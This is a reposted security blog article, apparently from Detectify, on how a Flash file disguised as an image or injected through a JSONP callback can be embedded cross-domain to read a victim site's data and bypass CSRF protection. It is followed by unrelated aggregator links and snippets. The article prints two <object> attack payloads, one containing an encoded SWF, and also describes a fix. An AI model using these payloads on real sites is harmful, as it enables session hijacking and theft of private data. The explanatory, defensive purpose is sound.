These days a lot of websites allow users to upload files, but many don’t know about the unknown pitfalls of letting users (potential attackers) upload files, even valid files.

What’s a valid file? Usually, a restriction would be on two parameters:

The uploaded file extension
The uploaded Content-Type

For example, the web application could check that the extension is “jpg” and the Content-Type “image/jpeg” to make sure it’s impossible to upload malicious files. Right?

The problem is that plugins like Flash doesn’t care about extension and Content-Type. If a file is embedded using an <object> tag, it will be executed as a Flash file as long as the content of the file looks like a valid Flash file.

But wait a minute! Shouldn’t the Flash be executed within the domain that embeds the file using the <object> tag? Yes and no. If a Flash file (bogus image file) is uploaded on victim.com and then embedded at attacker.com, the Flash file can execute JavaScript within the domain of attacker.com. However, if the Flash file sends requests, it will be allowed to read files within the domain of victim.com.

This basically means that if a website allows file uploads without validating the content of the file, an attacker can bypass any CSRF protection on the website.

The attack

Based on these facts we can create an attack scenario like this:

An attacker creates a malicious Flash (SWF) file
The attacker changes the file extension to JPG
The attacker uploads the file to victim.com
The attacker embeds the file on attacker.com using an <object> tag with type “application/x-shockwave-flash”
The victim visits attacker.com, loads the file as embedded with the <object> tag
The attacker can now send and receive arbitrary requests to victim.com using the victims session
The attacker sends a request to victim.com and extracts the CSRF token from the response

A payload could look like this:

 <object style="height:1px;width:1px;" data="http://victim.com/user/2292/profilepicture.jpg" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=read&u=http://victim.com/secret_file.txt"></object>

The fix

The good news is that there’s a fairly easy way to prevent Flash from doing this. Flash won’t execute the file if it sends a Content-Disposition header like so:

Content-Disposition: attachment; filename=”image.jpg”
Other uses

But the fun doesn’t stop at file uploads! Since the only requirements of this attack is that an attacker can control the data on a location of the target domain (regardless of Content-Type), there’s more ways to perform this attack.

One way would be to abuse a JSONP API. Usually, the attacker can control the output of a JSONP API endpoint by changing the callback of the current location. There’s no Cross-Site Scripting issue because the server will send Content-Type “application/json”. However, if an attacker uses an entire Flash file as callback and embeds that URL on their domain using the <object> tag, we have the same outcome. A payload could look like this:

<object style="height:1px;width:1px;" data="http://mywebsite.example.com/user/get?type=jsonp&callback=CWS%07%0E000x%9C%3D%8D1N%C3%40%10E%DF%AE%8D%BDI%08%29%D3%40%1D%A0%A2%05%09%11%89HiP%22%05D%8BF%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X%3B%21S%8C%FE%CC%9B%F9%FF%AA%CB7Jq%AF%7F%ED%F2%2E%F8%01%3E%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%AC%2C%9F%A5%28%B1%EB%89T%C2Jj%29%93%22%DBT7%24%9C%8FH%CBD6%29%A3%0Bx%29%AC%AD%D8%92%FB%1F%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b%5F%26%1C%9F5%20h%F1%D1g%0F%14%C1%0A%5Ds%8D%8B0Q%A8L%3C%9B6%D4L%BD%5F%A8w%7E%9D%5B%17%F3%2F%5B%DCm%7B%EF%CB%EF%E6%8D%3An%2D%FB%B3%C3%DD%2E%E3d1d%EC%C7%3F6%CD0%09" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=alert&u=http://mywebsite.example.com/secret_file.txt"></object>

And like always, if you want to know if your website has issues like these, try a Detectify scan!

That’s it for now

paper referer:https://labs.detectify.com/2014/05/20/the-lesser-known-pitfalls-of-allowing-file-uploads-on-your-website/

The lesser known pitfalls of allowing file uploads on your website的更多相关文章

  1. Asp.net mvc 3 file uploads using the fileapi

    Asp.net mvc 3 file uploads using the fileapi I was recently given the task of adding upload progress ...

  2. [转]File uploads in ASP.NET Core

    本文转自:https://docs.microsoft.com/en-us/aspnet/core/mvc/models/file-uploads By Steve Smith ASP.NET MVC ...

  3. [AngularFire] Angular File Uploads to Firebase Storage with Angular control value accessor

    The upload class will be used in the service layer. Notice it has a constructor for file attribute, ...

  4. Django处理文件上传File Uploads

    HttpRequest.FILES 表单上传的文件对象存储在类字典对象request.FILES中,表单格式需为multipart/form-data <form enctype="m ...

  5. jQuery File Upload 单页面多实例的实现

    jQuery File Upload 的 GitHub 地址:https://github.com/blueimp/jQuery-File-Upload 插件描述:jQuery File Upload ...

  6. 【转发】Html5 File Upload with Progress

    Html5 File Upload with Progress               Posted by Shiv Kumar on 25th September, 2010Senior Sof ...

  7. Resumable uploads over HTTP. Protocol specification

    Valery Kholodkov <valery@grid.net.ru>, 2010 1. Introduction This document describes applicatio ...

  8. Resumable Media Uploads in the Google Data Protocol

    Eric Bidelman, Google Apps APIs team February 2010 Introduction The Resumable Protocol Initiating a ...

  9. ExpressJS File Uploading – GridFS – MongoDB

    n this blog post we will see how to handle multipart data/file uploading with expressjs. Save files ...

随机推荐

  1. 【bzoj1299】[LLH邀请赛]巧克力棒(博弈论思维题)

    题目传送门:https://www.lydsy.com/JudgeOnline/problem.php?id=1299 首先我们把每根巧克力棒看成一堆石子,把巧克力棒的长度看作石子的个数,那么原问题就 ...

  2. Java 关于final那些事

    先说结论:对于引用类型的变量,Java本身会创建两个东西,一个是对象本身,另一个是记录对象地址的一个int值,将引用类型的对象声明为final实际上是固定记录地址的那个int的值不能改变,如果通过某种 ...

  3. SQL server 2008 T-sql 总结

    数据库的实现 1.添加数据:insert [into] 表名 (字段1,字段2,···) values (值1,值2,····)     其中,into可选. 2.修改数据:update 表名 set ...

  4. 【转】java中静态方法和非静态方法的存储

    将某 class 产生出一个 instance 之后,此 class 所有的 instance field 都会新增一份,那么所有的 instance method 是否也会新增一份?答案是不会,我们 ...

  5. Linux系统用户/用户组/文件权限相关

    目录一.Linux系统用户/用户组权限相关二.Linux系统文件权限相关 一.Linux系统用户/用户组权限相关 .命令:usermod 用法:usermod [-agGus] user args ‘ ...

  6. Spring Boot入门——json数据处理

    1.引入fastJson插件 <!-- 引入fastjson插件 --> <dependency> <groupId>com.alibaba</groupId ...

  7. Bellman-Ford算法 O(NE)

    Bellman-Ford算法 O(NE) 思路:枚举n-1次所有边,通过枚举所有边,将所有和已知点相连的点都设为已知,初始时起点为已知点. ;i<=n-;i++){ //n-1是次数,枚举n-1 ...

  8. Tair分布式缓存

    淘宝缓存架构         redis很好用,提供缓存服务.相比memcached多了新数据结构和主从模式增加可用性.不过redis有一点不能满足一些互联网公司开发者需求.           re ...

  9. python中常见的日期换算

    time模块提供各种操作时间的函数  说明:一般有两种表示时间的方式:       第一种是时间戳的方式(相对于1970.1.1 00:00:00以秒计算的偏移量),时间戳是惟一的       第二种 ...

  10. 1001 字符串“水”题(二进制,map,哈希)

    1001: 字符串“水”题 时间限制: 1 Sec  内存限制: 128 MB提交: 210  解决: 39[提交][状态][讨论版] 题目描述 给出一个长度为 n 的字符串(1<=n<= ...